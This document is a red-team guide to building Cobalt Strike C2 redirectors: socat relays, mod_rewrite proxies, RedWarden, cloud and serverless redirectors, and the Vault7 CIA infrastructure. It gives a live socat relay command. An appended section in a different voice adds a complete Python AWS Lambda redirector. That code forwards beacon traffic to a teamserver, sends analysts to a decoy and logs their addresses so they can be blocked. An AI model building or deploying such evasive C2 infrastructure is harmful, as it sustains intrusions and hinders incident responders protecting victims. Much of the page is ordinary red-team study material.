Cobalt Strike Redirectors

A redirector a day keeps IR away


Last updated 2 years ago

What is a redirector

During offensive operations, offensive infrastructure such as teamservers, phishing servers and staging servers is often discovered by defensive teams, who then take action against it, such as blocking it at the network perimeter or attempting to have it taken down by the hosting provider.

To minimize the impact of these defensive responses, offensive teams deploy proxy servers in front of their backend, commonly referred to as redirectors. When a defensive team blocks the beacon callback IP, they are blocking the IP of the redirector rather than the C2 server itself, and a burned redirector can be swapped out for another one without rebuilding the teamserver.

This can be combined with SSH tunneling and a private subnet to prevent unauthorized connections to, or scanning of, the malicious components of the offensive infrastructure (see Using SSH Tunneling to secure C2 infra).

A common redirector setup is diagrammed in this ired.team post on automating red team infrastructure with Terraform: https://www.ired.team/offensive-security/red-team-infrastructure/automating-red-team-infrastructure-with-terraform

While there are many ways of running these proxies, each with its own pros and cons, they all serve the same purpose: relaying traffic from the target to the backend offensive infrastructure, and back.

Simple redirector

The simplest TCP redirector uses socat. All it does is relay traffic to the backend and nothing else: no filtering, no TLS termination and no logging, so a scanner or an analyst connecting to the redirector reaches the teamserver's listener just like a beacon does. The fork option makes socat handle each incoming connection in a child process, so several beacons can call back at once.

Here's the socat command to forward connections on port 80 to 54.197.3.16:

socat TCP4-LISTEN:80,fork TCP4:54.197.3.16:80

Standard redirector

A very standard redirector setup. It uses an existing HTTP webserver such as apache or nginx to reverse-proxy HTTP traffic (for http/s beacons, of course) to the teamserver. Standard webserver security can be used to provide some level of protection for the backend without too many extra tricks: rewrite rules forward only requests that match the beacon's URIs and User-Agent, everything else is sent to a decoy site, and the webserver's own TLS and logging come for free. For phishing redirectors, an SMTP server such as postfix can be set up to relay email.

This type of redirector is documented on the Cobalt Strike website.

The apache redirector using mod_rewrite is documented at https://bluescreenofjeff.com/2016-06-28-cobalt-strike-http-c2-redirectors-with-apache-mod_rewrite/

Open source projects

There are open source (or otherwise) projects that aim to add defensive or evasive capabilities to C2 redirectors. One example is RedWarden by mgeeky (https://github.com/mgeeky/RedWarden). It has additional capabilities such as blocking and logging traffic that could be from defensive teams investigating the infrastructure. This type of redirector can be useful in slowing down the defensive response, in addition to proxying traffic for the C2 server.

Using cloud services as redirectors

Services like Azure App Service and AWS Elastic Beanstalk can be used to redirect traffic to your offensive infrastructure. The main benefit of these redirectors is that they come with domain names and TLS certificates from the cloud provider, which may make them look less suspicious and get past some network filters.

Serverless code can also be used as a redirector in a similar way. Here are some examples of cloud services as redirectors:

Azure Web App Service for offensive operations (Trustwave SpiderLabs): https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/azure-web-app-service-for-offensive-operations/

AWS Lambda redirector (XPN): https://blog.xpnsec.com/aws-lambda-redirector/

Serverless redirectors can have features similar to "smart" redirectors, depending on the code used.

CIA redirector setup (Old Vault7 leak)

The CIA has also been known to use C2 redirectors, based on the (now old) Vault7 leaks. This is explained in more detail in the following post by byt3bl33d3r: https://byt3bl33d3r.substack.com/p/taking-the-pain-out-of-c2-infrastructure-3c4. Their infrastructure closely resembles modern red team infrastructure and tools: implants call back to a set of redirectors which forward traffic to a C2 server. They appear to favor mTLS to authenticate their implants at the redirector level, making it harder to investigate their backend infrastructure externally.

(Figure: Vault7 leaked documentation of CIA's offensive infrastructure)

Starting shell companies to host redirectors is probably not practical for any non state backed operators. lol.
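Pulling together the standard redirector, the filtering that projects like RedWarden add, and the serverless deployment described above, here is an added example that is not code from this page, Cobalt Strike, RedWarden or any of the linked posts: a Python AWS Lambda function URL handler that forwards only requests matching a beacon profile to the teamserver and sends everything else to a decoy, logging the source so the operator can block it. TEAMSERVER, DECOY, the PROFILE values, the function URL hostname and the two sample events are all assumptions constructed for the example; the event layout is the Lambda function URL / API Gateway v2 JSON payload.

```python
# Added example (not from this page, Cobalt Strike, RedWarden or the linked posts):
# a filtering redirector as an AWS Lambda function URL handler.
# Assumptions, all hypothetical/constructed: TEAMSERVER, DECOY, the PROFILE values,
# the function URL hostname and the two sample events. Event layout is the Lambda
# function URL / API Gateway v2 payload (rawPath, rawQueryString, headers, body,
# isBase64Encoded, requestContext.http.method / sourceIp).
import base64
import os
import urllib.error
import urllib.request

TEAMSERVER = os.environ.get("TEAMSERVER", "http://10.0.0.5")  # hypothetical backend, privately reachable
DECOY = os.environ.get("DECOY", "https://www.example.com/")    # hypothetical benign site for everyone else

# Constructed profile: the URIs, User-Agent and header a beacon would use under a
# (made-up) Malleable C2 profile. Only traffic matching all of it reaches the teamserver.
PROFILE = {
    "get_uris": {"/jquery-3.3.1.min.js"},
    "post_uris": {"/jquery-3.3.2.min.js"},
    "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120.0 Safari/537.36",
    "required_headers": {"accept": "*/*"},
}

def is_beacon_request(method, path, headers):
    """True only when method, URI, User-Agent and required headers all match PROFILE."""
    h = {k.lower(): v for k, v in headers.items()}
    uris = {"GET": PROFILE["get_uris"], "POST": PROFILE["post_uris"]}.get(method, set())
    if path not in uris:
        return False
    if h.get("user-agent") != PROFILE["user_agent"]:
        return False
    return all(h.get(name) == value for name, value in PROFILE["required_headers"].items())

def parse_event(event):
    """Pull method, path, query string, headers and raw body bytes out of the event."""
    method = event["requestContext"]["http"]["method"]
    headers = event.get("headers") or {}
    body = event.get("body") or ""
    raw = base64.b64decode(body) if event.get("isBase64Encoded") else body.encode()
    return method, event.get("rawPath", "/"), event.get("rawQueryString", ""), headers, raw

def route(event):
    """Network-free decision: 'forward' to the teamserver or 'decoy'."""
    method, path, _, headers, _ = parse_event(event)
    return "forward" if is_beacon_request(method, path, headers) else "decoy"

def decoy_response(method, path, headers, source_ip):
    """Log the non-beacon visitor (so the operator can block it) and bounce it to DECOY."""
    print(f"non-beacon request from {source_ip}: {method} {path} ua={headers.get('user-agent')!r}")
    return {"statusCode": 302, "headers": {"Location": DECOY}, "body": ""}

def forward_request(method, path, qs, headers, raw):
    """Proxy the beacon's request to the teamserver and wrap the reply in Lambda format."""
    url = TEAMSERVER + path + (f"?{qs}" if qs else "")
    # Drop the function URL's own Host and the length header urllib recomputes; keep
    # X-Forwarded-For so the teamserver still sees the beacon's real address.
    fwd = {k: v for k, v in headers.items() if k.lower() not in ("host", "content-length")}
    req = urllib.request.Request(url, data=raw if method == "POST" else None, headers=fwd, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            status, data = resp.status, resp.read()
            resp_headers = {k: v for k, v in resp.headers.items()
                            if k.lower() not in ("transfer-encoding", "content-length")}
    except urllib.error.HTTPError as err:  # pass teamserver error codes through unchanged
        status, data, resp_headers = err.code, err.read(), {}
    return {"statusCode": status, "headers": resp_headers,
            "isBase64Encoded": True, "body": base64.b64encode(data).decode()}

def lambda_handler(event, context=None):
    """Entry point the function URL invokes: filter first, forward only real beacon traffic."""
    method, path, qs, headers, raw = parse_event(event)
    source_ip = event["requestContext"]["http"].get("sourceIp", "?")
    if not is_beacon_request(method, path, headers):
        return decoy_response(method, path, headers, source_ip)
    return forward_request(method, path, qs, headers, raw)

# Constructed sample events (TEST-NET addresses, made-up function URL hostname).
_HOST = "abc123.lambda-url.us-east-1.on.aws"
BEACON_EVENT = {
    "rawPath": "/jquery-3.3.1.min.js", "rawQueryString": "",
    "headers": {"host": _HOST, "user-agent": PROFILE["user_agent"], "accept": "*/*"},
    "requestContext": {"http": {"method": "GET", "sourceIp": "203.0.113.10"}},
    "body": "", "isBase64Encoded": False,
}
SCANNER_EVENT = {
    "rawPath": "/", "rawQueryString": "",
    "headers": {"host": _HOST, "user-agent": "curl/8.0.1", "accept": "*/*"},
    "requestContext": {"http": {"method": "GET", "sourceIp": "198.51.100.7"}},
    "body": "", "isBase64Encoded": False,
}

if __name__ == "__main__":
    for name, ev in (("beacon", BEACON_EVENT), ("scanner", SCANNER_EVENT)):
        print(name, "->", route(ev))
```

route() is the network-free decision used for the dry run; lambda_handler() is what the function URL actually invokes. An analyst curling the function URL gets a 302 to the decoy and a log line with their source address, while the teamserver listener is never touched, which is the "smart" behaviour the page attributes to RedWarden-style redirectors. Matching is deliberately exact (method, URI, User-Agent and the extra header), because a profile check that is looser than the beacon's own traffic is what lets scanners through.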